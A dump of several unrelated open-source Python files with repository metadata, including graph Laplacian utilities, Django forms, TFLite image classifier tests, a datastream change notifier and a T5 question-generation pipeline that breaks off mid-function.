'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['djangocms_events']
| 66.56044
| 177
| 0.579165
|
6d483295229e88d0b0fe472751c0f43066742443
| 4,260
|
py
|
Python
|
lib/utils.py
|
tijsmaas/TrafficPrediction
|
9129faea8fee8c2d90595d2974f0b11030ad2674
|
[
"MIT"
] | 17
|
2020-08-16T04:17:57.000Z
|
2022-02-28T01:13:49.000Z
|
lib/utils.py
|
tijsmaas/TrafficPrediction
|
9129faea8fee8c2d90595d2974f0b11030ad2674
|
[
"MIT"
] | null | null | null |
lib/utils.py
|
tijsmaas/TrafficPrediction
|
9129faea8fee8c2d90595d2974f0b11030ad2674
|
[
"MIT"
] | 5
|
2020-05-23T07:47:15.000Z
|
2021-11-16T15:05:05.000Z
|
import scipy.sparse as sp
from lib.dataloaders.dataloader import *
from scipy.sparse import linalg
import numpy as np
import pickle
def sym_adj(adj):
"""Symmetrically normalize adjacency matrix."""
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1))
d_inv_sqrt = np.power(rowsum, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).astype(np.float32).todense()
def asym_adj(adj):
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1)).flatten()
d_inv = np.power(rowsum, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
d_mat= sp.diags(d_inv)
return d_mat.dot(adj).astype(np.float32).todense()
def calculate_normalized_laplacian(adj):
"""
# L = D^-1/2 (D-A) D^-1/2 = I - D^-1/2 A D^-1/2
# D = diag(A 1)
:param adj:
:return:
"""
adj = sp.coo_matrix(adj)
d = np.array(adj.sum(1))
d_inv_sqrt = np.power(d, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
normalized_laplacian = sp.eye(adj.shape[0]) - adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()
return normalized_laplacian
def calculate_random_walk_matrix(adj_mx):
adj_mx = sp.coo_matrix(adj_mx)
d = np.array(adj_mx.sum(1))
d_inv = np.power(d, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
d_mat_inv = sp.diags(d_inv)
random_walk_mx = d_mat_inv.dot(adj_mx).tocoo()
return random_walk_mx
def calculate_reverse_random_walk_matrix(adj_mx):
return calculate_random_walk_matrix(np.transpose(adj_mx))
def calculate_scaled_laplacian(adj_mx, lambda_max=2, undirected=True):
if undirected:
adj_mx = np.maximum.reduce([adj_mx, adj_mx.T])
L = calculate_normalized_laplacian(adj_mx)
if lambda_max is None:
lambda_max, _ = linalg.eigsh(L, 1, which='LM')
lambda_max = lambda_max[0]
L = sp.csr_matrix(L)
M, _ = L.shape
I = sp.identity(M, format='csr', dtype=L.dtype)
L = (2 / lambda_max * L) - I
return L.astype(np.float32)
def get_total_trainable_parameter_size():
"""
Calculates the total number of trainable parameters in the current graph.
:return:
"""
total_parameters = 0
import tensorflow as tf
for variable in tf.trainable_variables():
# shape is an array of tf.Dimension
total_parameters += np.product([x.value for x in variable.get_shape()])
return total_parameters
def load_pickle(pickle_file):
try:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f)
except UnicodeDecodeError as e:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f, encoding='latin1')
except Exception as e:
print('Unable to load data ', pickle_file, ':', e)
raise
return pickle_data
def load_adj(pkl_filename, adjtype):
sensor_ids, sensor_id_to_ind, adj_mx = load_pickle(pkl_filename)
if adjtype == "scalap":
adj = [calculate_scaled_laplacian(adj_mx)]
elif adjtype == "normlap":
adj = [calculate_normalized_laplacian(adj_mx).astype(np.float32).todense()]
elif adjtype == "symnadj":
adj = [sym_adj(adj_mx)]
elif adjtype == "transition":
adj = [asym_adj(adj_mx)]
elif adjtype == "doubletransition":
adj = [asym_adj(adj_mx), asym_adj(np.transpose(adj_mx))]
elif adjtype == "random_walk":
adj = [np.transpose(calculate_random_walk_matrix(adj_mx))]
elif adjtype == "dual_random_walk":
adj = [np.transpose(calculate_random_walk_matrix(adj_mx)),
np.transpose(calculate_random_walk_matrix(np.transpose(adj_mx)))]
elif adjtype == "identity":
adj = [np.diag(np.ones(adj_mx.shape[0])).astype(np.float32)]
else:
error = 0
assert error, "adj type not defined"
return sensor_ids, sensor_id_to_ind, adj
def load_dataset(dataset_file, batch_size, val_batch_size=None, test_batch_size=None, **kwargs):
ds = Dataset(dataset_file)
ds.load_category('train', batch_size)
ds.data['train_loader'].shuffle()
ds.load_category('val', val_batch_size)
ds.load_category('test', test_batch_size)
return ds
| 34.634146
| 113
| 0.669718
|
5e0ffb9e4479ab798e2c84cde42a609743d1a419
| 26
|
py
|
Python
|
python/testData/psi/DictMissingValue.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/psi/DictMissingValue.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/psi/DictMissingValue.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
dl = {key1: value1, key2:}
| 26
| 26
| 0.615385
|
30ef5b615a6040925aa0ff2239d3c905067bf712
| 1,034
|
py
|
Python
|
rapidez/main/forms.py
|
asisbagga-dev/RapidezWriter
|
e1453e69978b6def402ea64805415e6758ee4459
|
[
"MIT"
] | null | null | null |
rapidez/main/forms.py
|
asisbagga-dev/RapidezWriter
|
e1453e69978b6def402ea64805415e6758ee4459
|
[
"MIT"
] | 11
|
2021-04-06T18:30:11.000Z
|
2022-03-12T00:53:28.000Z
|
rapidez/main/forms.py
|
asisbagga-dev/RapidezWriter
|
e1453e69978b6def402ea64805415e6758ee4459
|
[
"MIT"
] | null | null | null |
from django import forms
from .models import Database, Category, Testimonials
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class Databaseform(forms.ModelForm):
class Meta:
model = Database
fields = ('heading',
'description',
'banner',
'category')
class Categoryform(forms.ModelForm):
class Meta:
model = Category
fields = '__all__'
class Testimonialform(forms.ModelForm):
class Meta:
model = Testimonials
fields = '__all__'
class SignUpForm(UserCreationForm):
first_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
last_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', )
| 33.354839
| 97
| 0.667311
|
e2d8eccfa0868ce494e9b037529d59c28989f8cf
| 10,690
|
py
|
Python
|
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
|
ccen-stripe/tflite-support
|
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
|
ccen-stripe/tflite-support
|
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
|
ccen-stripe/tflite-support
|
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for image_classifier."""
import enum
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_lite_support.python.task.core import base_options as base_options_module
from tensorflow_lite_support.python.task.processor.proto import bounding_box_pb2
from tensorflow_lite_support.python.task.processor.proto import class_pb2
from tensorflow_lite_support.python.task.processor.proto import classification_options_pb2
from tensorflow_lite_support.python.task.processor.proto import classifications_pb2
from tensorflow_lite_support.python.task.vision import image_classifier
from tensorflow_lite_support.python.task.vision.core import tensor_image
from tensorflow_lite_support.python.test import test_util
_BaseOptions = base_options_module.BaseOptions
_Category = class_pb2.Category
_Classifications = classifications_pb2.Classifications
_ClassificationResult = classifications_pb2.ClassificationResult
_ImageClassifier = image_classifier.ImageClassifier
_ImageClassifierOptions = image_classifier.ImageClassifierOptions
_MODEL_FILE = 'mobilenet_v2_1.0_224.tflite'
_IMAGE_FILE = 'burger.jpg'
_EXPECTED_CLASSIFICATION_RESULT = _ClassificationResult(classifications=[
_Classifications(
categories=[
_Category(
index=934,
score=0.739974,
display_name='',
category_name='cheeseburger'),
_Category(
index=925,
score=0.026929,
display_name='',
category_name='guacamole'),
_Category(
index=932,
score=0.025737,
display_name='',
category_name='bagel')
],
head_index=0,
head_name='')
])
_ALLOW_LIST = ['cheeseburger', 'guacamole']
_DENY_LIST = ['cheeseburger']
_SCORE_THRESHOLD = 0.5
_MAX_RESULTS = 3
def _create_classifier_from_options(base_options, **classification_options):
classification_options = classification_options_pb2.ClassificationOptions(
**classification_options)
options = _ImageClassifierOptions(
base_options=base_options, classification_options=classification_options)
classifier = _ImageClassifier.create_from_options(options)
return classifier
class ModelFileType(enum.Enum):
FILE_CONTENT = 1
FILE_NAME = 2
class ImageClassifierTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
super().setUp()
self.test_image_path = test_util.get_test_data_path(_IMAGE_FILE)
self.model_path = test_util.get_test_data_path(_MODEL_FILE)
def test_create_from_file_succeeds_with_valid_model_path(self):
# Creates with default option and valid model file successfully.
classifier = _ImageClassifier.create_from_file(self.model_path)
self.assertIsInstance(classifier, _ImageClassifier)
def test_create_from_options_succeeds_with_valid_model_path(self):
# Creates with options containing model file successfully.
base_options = _BaseOptions(file_name=self.model_path)
options = _ImageClassifierOptions(base_options=base_options)
classifier = _ImageClassifier.create_from_options(options)
self.assertIsInstance(classifier, _ImageClassifier)
def test_create_from_options_fails_with_invalid_model_path(self):
# Invalid empty model path.
with self.assertRaisesRegex(
ValueError,
r"ExternalFile must specify at least one of 'file_content', "
r"'file_name' or 'file_descriptor_meta'."):
base_options = _BaseOptions(file_name='')
options = _ImageClassifierOptions(base_options=base_options)
_ImageClassifier.create_from_options(options)
def test_create_from_options_succeeds_with_valid_model_content(self):
# Creates with options containing model content successfully.
with open(self.model_path, 'rb') as f:
base_options = _BaseOptions(file_content=f.read())
options = _ImageClassifierOptions(base_options=base_options)
classifier = _ImageClassifier.create_from_options(options)
self.assertIsInstance(classifier, _ImageClassifier)
@parameterized.parameters(
(ModelFileType.FILE_NAME, 3, _EXPECTED_CLASSIFICATION_RESULT),
(ModelFileType.FILE_CONTENT, 3, _EXPECTED_CLASSIFICATION_RESULT))
def test_classify_model(self, model_file_type, max_results,
expected_classification_result):
# Creates classifier.
if model_file_type is ModelFileType.FILE_NAME:
base_options = _BaseOptions(file_name=self.model_path)
elif model_file_type is ModelFileType.FILE_CONTENT:
with open(self.model_path, 'rb') as f:
model_content = f.read()
base_options = _BaseOptions(file_content=model_content)
else:
# Should never happen
raise ValueError('model_file_type is invalid.')
classifier = _create_classifier_from_options(
base_options, max_results=max_results)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
# Comparing results (classification w/o bounding box).
self.assertProtoEquals(image_result.to_pb2(),
expected_classification_result.to_pb2())
def test_classify_model_with_bounding_box(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(base_options, max_results=3)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Bounding box in "burger.jpg" corresponding to "burger_crop.jpg".
bounding_box = bounding_box_pb2.BoundingBox(
origin_x=0, origin_y=0, width=400, height=325)
# Classifies the input.
image_result = classifier.classify(image, bounding_box)
# Expected results.
expected_classification_result = _ClassificationResult(classifications=[
_Classifications(
categories=[
_Category(
index=934,
score=0.881507,
display_name='',
category_name='cheeseburger'),
_Category(
index=925,
score=0.019457,
display_name='',
category_name='guacamole'),
_Category(
index=932,
score=0.012489,
display_name='',
category_name='bagel')
],
head_index=0,
head_name='')
])
# Comparing results (classification w/ bounding box).
self.assertProtoEquals(image_result.to_pb2(),
expected_classification_result.to_pb2())
def test_max_results_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, max_results=_MAX_RESULTS)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
self.assertLessEqual(
len(categories), _MAX_RESULTS, 'Too many results returned.')
def test_score_threshold_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, score_threshold=_SCORE_THRESHOLD)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
for category in categories:
self.assertGreaterEqual(
category.score, _SCORE_THRESHOLD,
f'Classification with score lower than threshold found. {category}')
def test_allowlist_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, category_name_allowlist=_ALLOW_LIST)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
for category in categories:
label = category.category_name
self.assertIn(label, _ALLOW_LIST,
f'Label {label} found but not in label allow list')
def test_denylist_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, score_threshold=0.01, category_name_denylist=_DENY_LIST)
# Loads image
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
for category in categories:
label = category.category_name
self.assertNotIn(label, _DENY_LIST,
f'Label {label} found but in deny list.')
def test_combined_allowlist_and_denylist(self):
# Fails with combined allowlist and denylist
with self.assertRaisesRegex(
ValueError,
r'`class_name_whitelist` and `class_name_blacklist` are mutually '
r'exclusive options.'):
base_options = _BaseOptions(file_name=self.model_path)
classification_options = classification_options_pb2.ClassificationOptions(
category_name_allowlist=['foo'], category_name_denylist=['bar'])
options = _ImageClassifierOptions(
base_options=base_options,
classification_options=classification_options)
_ImageClassifier.create_from_options(options)
if __name__ == '__main__':
tf.test.main()
| 37.907801
| 90
| 0.724228
|
9197cb6e3a218c9c6f7dc65d7d2de551ba0668fd
| 103
|
py
|
Python
|
python3/func.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/func.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/func.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
def spam():
eggs = 99
bacon()
print(eggs)
def bacon():
ham = 101
eggs = 0
spam()
| 10.3
| 15
| 0.485437
|
79b3da64c89f9152072afde814c1596079a73445
| 2,366
|
py
|
Python
|
core/datastream/change.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | 1
|
2019-09-20T09:36:48.000Z
|
2019-09-20T09:36:48.000Z
|
core/datastream/change.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
core/datastream/change.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# DataStream change notification
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import logging
import threading
import contextlib
# NOC modules
from noc.core.defer import call_later
from noc.core.datastream.loader import loader
tls = threading.local()
logger = logging.getLogger(__name__)
def register_changes(data):
"""
Register single change
:param data: List of (datasource name, object id)
:return:
"""
if hasattr(tls, "_datastream_changes"):
# Within bulk_datastream_changes context
tls._datastream_changes.update(data)
else:
apply_changes(data)
@contextlib.contextmanager
def bulk_datastream_changes():
"""
Buffer and deduplicate pending datastream changes
Usage:
with bulk_datastream_changes:
....
:return:
"""
# Save previous state
last_changes = getattr(tls, "_datastream_changes", None)
# Create new context
tls._datastream_changes = set()
# Perform decorated computations
yield
# Apply changes
apply_changes(list(tls._datastream_changes))
# Restore previous context
if last_changes is not None:
tls._datastream_changes = last_changes
else:
del tls._datastream_changes
def apply_changes(changes):
"""
:param changes: List of (datastream name, object id)
:return:
"""
if changes:
call_later("noc.core.datastream.change.do_changes", changes=changes)
def update_object(ds_name, object_id):
"""
Really apply DataStream updates
:param ds_name:
:param object_id:
:return:
"""
ds = loader[ds_name]
if not ds:
return
r = ds.update_object(object_id)
if r:
logger.info("[%s|%s] Object has been changed", ds_name, object_id)
else:
logger.info("[%s|%s] Object hasn't been changed", ds_name, object_id)
def do_changes(changes):
"""
Change calculation worker
:param changes: List of datastream name, object id
:return:
"""
for ds_name, object_id in sorted(changes):
update_object(ds_name, object_id)
| 24.645833
| 77
| 0.610313
|
a759be85790b9d4d4dbe38e7c7e37eed3c3ad62a
| 2,525
|
py
|
Python
|
statsmodels/datasets/committee/data.py
|
escheffel/statsmodels
|
bc70147c4c7ea00b6ac7256bbaf107902983c189
|
[
"BSD-3-Clause"
] | 2
|
2017-01-05T22:44:37.000Z
|
2018-04-26T08:34:00.000Z
|
statsmodels/datasets/committee/data.py
|
changhiskhan/statsmodels
|
af26395e8b75b112ae7b3099532aefd8d002b8ca
|
[
"BSD-3-Clause"
] | null | null | null |
statsmodels/datasets/committee/data.py
|
changhiskhan/statsmodels
|
af26395e8b75b112ae7b3099532aefd8d002b8ca
|
[
"BSD-3-Clause"
] | null | null | null |
"""First 100 days of the US House of Representatives 1995"""
__docformat__ = 'restructuredtext'
COPYRIGHT = """Used with express permission from the original author,
who retains all rights."""
TITLE = __doc__
SOURCE = """
Jeff Gill's `Generalized Linear Models: A Unifited Approach`
http://jgill.wustl.edu/research/books.html
"""
DESCRSHORT = """Number of bill assignments in the 104th House in 1995"""
DESCRLONG = """The example in Gill, seeks to explain the number of bill
assignments in the first 100 days of the US' 104th House of Representatives.
The response variable is the number of bill assignments in the first 100 days
over 20 Committees. The explanatory variables in the example are the number of
assignments in the first 100 days of the 103rd House, the number of members on
the committee, the number of subcommittees, the log of the number of staff
assigned to the committee, a dummy variable indicating whether
the committee is a high prestige committee, and an interaction term between
the number of subcommittees and the log of the staff size.
The data returned by load are not cleaned to represent the above example.
"""
NOTE = """Number of Observations - 20
Number of Variables - 6
Variable name definitions::
BILLS104 - Number of bill assignments in the first 100 days of the 104th
House of Representatives.
SIZE - Number of members on the committee.
SUBS - Number of subcommittees.
STAFF - Number of staff members assigned to the committee.
PRESTIGE - PRESTIGE == 1 is a high prestige committee.
BILLS103 - Number of bill assignments in the first 100 days of the 103rd
House of Representatives.
Committee names are included as a variable in the data file though not
returned by load.
"""
from numpy import recfromtxt, column_stack, array
import statsmodels.tools.datautils as du
from os.path import dirname, abspath
def load():
"""Load the committee data and returns a data class.
Returns
--------
Dataset instance:
See DATASET_PROPOSAL.txt for more information.
"""
data = _get_data()
return du.process_recarray(data, endog_idx=0, dtype=float)
def load_pandas():
data = _get_data()
return du.process_recarray_pandas(data, endog_idx=0, dtype=float)
def _get_data():
filepath = dirname(abspath(__file__))
data = recfromtxt(open(filepath + '/committee.csv', 'rb'), delimiter=",",
names=True, dtype=float, usecols=(1,2,3,4,5,6))
return data
| 35.069444
| 79
| 0.725149
|
ede6f55df27cbc102012eb8d7a7312413cdb6ded
| 13,895
|
py
|
Python
|
pipelines.py
|
flash-ai-fydp/question_generation
|
fba1e2292e26207b99db8dc783536b9bf51d786e
|
[
"MIT"
] | null | null | null |
pipelines.py
|
flash-ai-fydp/question_generation
|
fba1e2292e26207b99db8dc783536b9bf51d786e
|
[
"MIT"
] | null | null | null |
pipelines.py
|
flash-ai-fydp/question_generation
|
fba1e2292e26207b99db8dc783536b9bf51d786e
|
[
"MIT"
] | null | null | null |
import itertools
import logging
from typing import Optional, Dict, Union
from nltk import sent_tokenize
import torch
from transformers import(
AutoModelForSeq2SeqLM,
AutoTokenizer,
PreTrainedModel,
PreTrainedTokenizer,
)
logger = logging.getLogger(__name__)
class QGPipeline:
"""Poor man's QG pipeline"""
def __init__(
self,
model: PreTrainedModel,
tokenizer: PreTrainedTokenizer,
ans_model: PreTrainedModel,
ans_tokenizer: PreTrainedTokenizer,
qg_format: str,
use_cuda: bool
):
self.model = model
self.tokenizer = tokenizer
self.ans_model = ans_model
self.ans_tokenizer = ans_tokenizer
self.qg_format = qg_format
self.device = "cuda" if torch.cuda.is_available() and use_cuda else "cpu"
self.model.to(self.device)
if self.ans_model is not self.model:
self.ans_model.to(self.device)
assert self.model.__class__.__name__ in [
"T5ForConditionalGeneration", "BartForConditionalGeneration"]
if "T5ForConditionalGeneration" in self.model.__class__.__name__:
self.model_type = "t5"
else:
self.model_type = "bart"
def __call__(self, inputs: str):
inputs = " ".join(inputs.split())
sents, answers = self._extract_answers(inputs)
flat_answers = list(itertools.chain(*answers))
if len(flat_answers) == 0:
return []
if self.qg_format == "prepend":
qg_examples = self._prepare_inputs_for_qg_from_answers_prepend(
inputs, answers)
else:
qg_examples = self._prepare_inputs_for_qg_from_answers_hl(
sents, answers)
qg_inputs = [example['source_text'] for example in qg_examples]
questions = self._generate_questions(qg_inputs)
output = [{'answer': example['answer'], 'question': que}
for example, que in zip(qg_examples, questions)]
return output
def _generate_questions(self, inputs):
inputs = self._tokenize(inputs, padding=True, truncation=True)
outs = self.model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
max_length=32,
num_beams=4,
)
questions = [self.tokenizer.decode(
ids, skip_special_tokens=True) for ids in outs]
return questions
def _extract_answers(self, context):
sents, inputs = self._prepare_inputs_for_ans_extraction(context)
inputs = self._tokenize(inputs, padding=True, truncation=True)
outs = self.ans_model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
max_length=32,
)
dec = [self.ans_tokenizer.decode(
ids, skip_special_tokens=False) for ids in outs]
answers = [item.split('<sep>') for item in dec]
answers = [i[:-1] for i in answers]
return sents, answers
def _tokenize(self,
inputs,
padding=True,
truncation=True,
add_special_tokens=True,
max_length=512
):
inputs = self.tokenizer.batch_encode_plus(
inputs,
max_length=max_length,
add_special_tokens=add_special_tokens,
truncation=truncation,
padding="max_length" if padding else False,
pad_to_max_length=padding,
return_tensors="pt"
)
return inputs
def _prepare_inputs_for_ans_extraction(self, text):
sents = sent_tokenize(text)
inputs = []
for i in range(len(sents)):
source_text = "extract answers:"
for j, sent in enumerate(sents):
if i == j:
sent = "<hl> %s <hl>" % sent
source_text = "%s %s" % (source_text, sent)
source_text = source_text.strip()
if self.model_type == "t5":
source_text = source_text + " </s>"
inputs.append(source_text)
return sents, inputs
def _prepare_inputs_for_qg_from_answers_hl(self, sents, answers):
inputs = []
for i, answer in enumerate(answers):
if len(answer) == 0:
continue
for answer_text in answer:
try:
sent = sents[i]
sents_copy = sents[:]
answer_text = answer_text.strip()
ans_start_idx = sent.index(answer_text)
sent = f"{sent[:ans_start_idx]} <hl> {answer_text} <hl> {sent[ans_start_idx + len(answer_text): ]}"
sents_copy[i] = sent
source_text = " ".join(sents_copy)
source_text = f"generate question: {source_text}"
if self.model_type == "t5":
source_text = source_text + " </s>"
inputs.append(
{"answer": answer_text, "source_text": source_text})
except Exception as e:
logger.exception("Error getting answer %s" % e)
return inputs
def _prepare_inputs_for_qg_from_answers_prepend(self, context, answers):
flat_answers = list(itertools.chain(*answers))
examples = []
for answer in flat_answers:
source_text = f"answer: {answer} context: {context}"
if self.model_type == "t5":
source_text = source_text + " </s>"
examples.append({"answer": answer, "source_text": source_text})
return examples
class MultiTaskQAQGPipeline(QGPipeline):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def __call__(self, inputs: Union[Dict, str]):
if type(inputs) is str:
# do qg
return super().__call__(inputs)
else:
# do qa
return self._extract_answer(inputs["question"], inputs["context"])
def _prepare_inputs_for_qa(self, question, context):
source_text = f"question: {question} context: {context}"
if self.model_type == "t5":
source_text = source_text + " </s>"
return source_text
def _extract_answer(self, question, context):
source_text = self._prepare_inputs_for_qa(question, context)
inputs = self._tokenize([source_text], padding=False)
outs = self.model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
max_length=16,
)
answer = self.tokenizer.decode(outs[0], skip_special_tokens=True)
return answer
class E2EQGPipeline:
def __init__(
self,
model: PreTrainedModel,
tokenizer: PreTrainedTokenizer,
use_cuda: bool
):
self.model = model
self.tokenizer = tokenizer
self.device = "cuda" if torch.cuda.is_available() and use_cuda else "cpu"
self.model.to(self.device)
assert self.model.__class__.__name__ in [
"T5ForConditionalGeneration", "BartForConditionalGeneration"]
if "T5ForConditionalGeneration" in self.model.__class__.__name__:
self.model_type = "t5"
else:
self.model_type = "bart"
self.default_generate_kwargs = {
"max_length": 256,
"num_beams": 4,
"length_penalty": 1.5,
"no_repeat_ngram_size": 3,
"early_stopping": True,
}
def __call__(self, context: str, **generate_kwargs):
inputs = self._prepare_inputs_for_e2e_qg(context)
# TODO: when overrding default_generate_kwargs all other arguments need to be passsed
# find a better way to do this
if not generate_kwargs:
generate_kwargs = self.default_generate_kwargs
input_length = inputs["input_ids"].shape[-1]
# max_length = generate_kwargs.get("max_length", 256)
# if input_length < max_length:
# logger.warning(
# "Your max_length is set to {}, but you input_length is only {}. You might consider decreasing max_length manually, e.g. summarizer('...', max_length=50)".format(
# max_length, input_length
# )
# )
outs = self.model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
**generate_kwargs
)
prediction = self.tokenizer.decode(outs[0], skip_special_tokens=True)
questions = prediction.split("<sep>")
questions = [question.strip() for question in questions[:-1]]
return questions
def _prepare_inputs_for_e2e_qg(self, context):
source_text = f"generate questions: {context}"
if self.model_type == "t5":
source_text = source_text + " </s>"
inputs = self._tokenize([source_text], padding=False)
return inputs
def _tokenize(
self,
inputs,
padding=True,
truncation=True,
add_special_tokens=True,
max_length=512
):
inputs = self.tokenizer.batch_encode_plus(
inputs,
max_length=max_length,
add_special_tokens=add_special_tokens,
truncation=truncation,
padding="max_length" if padding else False,
pad_to_max_length=padding,
return_tensors="pt"
)
return inputs
SUPPORTED_TASKS = {
"question-generation": {
"impl": QGPipeline,
"default": {
"model": "valhalla/t5-small-qg-hl",
"ans_model": "valhalla/t5-small-qa-qg-hl",
}
},
"multitask-qa-qg": {
"impl": MultiTaskQAQGPipeline,
"default": {
"model": "valhalla/t5-small-qa-qg-hl",
}
},
"e2e-qg": {
"impl": E2EQGPipeline,
"default": {
"model": "valhalla/t5-small-e2e-qg",
}
}
}
def pipeline(
task: str,
model: Optional = None,
tokenizer: Optional[Union[str, PreTrainedTokenizer]] = None,
qg_format: Optional[str] = "highlight",
ans_model: Optional = None,
ans_tokenizer: Optional[Union[str, PreTrainedTokenizer]] = None,
use_cuda: Optional[bool] = True,
**kwargs,
):
# Retrieve the task
if task not in SUPPORTED_TASKS:
raise KeyError("Unknown task {}, available tasks are {}".format(
task, list(SUPPORTED_TASKS.keys())))
targeted_task = SUPPORTED_TASKS[task]
task_class = targeted_task["impl"]
# Use default model/config/tokenizer for the task if no model is provided
if model is None:
model = targeted_task["default"]["model"]
# Try to infer tokenizer from model or config name (if provided as str)
if tokenizer is None:
if isinstance(model, str):
tokenizer = model
else:
# Impossible to guest what is the right tokenizer here
raise Exception(
"Impossible to guess which tokenizer to use. "
"Please provided a PretrainedTokenizer class or a path/identifier to a pretrained tokenizer."
)
# Instantiate tokenizer if needed
if isinstance(tokenizer, (str, tuple)):
if isinstance(tokenizer, tuple):
# For tuple we have (tokenizer name, {kwargs})
tokenizer = AutoTokenizer.from_pretrained(
tokenizer[0], **tokenizer[1])
else:
tokenizer = AutoTokenizer.from_pretrained(tokenizer)
# Instantiate model if needed
if isinstance(model, str):
model = AutoModelForSeq2SeqLM.from_pretrained(model)
if task == "question-generation":
if ans_model is None:
# load default ans model
ans_model = targeted_task["default"]["ans_model"]
ans_tokenizer = AutoTokenizer.from_pretrained(ans_model)
ans_model = AutoModelForSeq2SeqLM.from_pretrained(ans_model)
else:
# Try to infer tokenizer from model or config name (if provided as str)
if ans_tokenizer is None:
if isinstance(ans_model, str):
ans_tokenizer = ans_model
else:
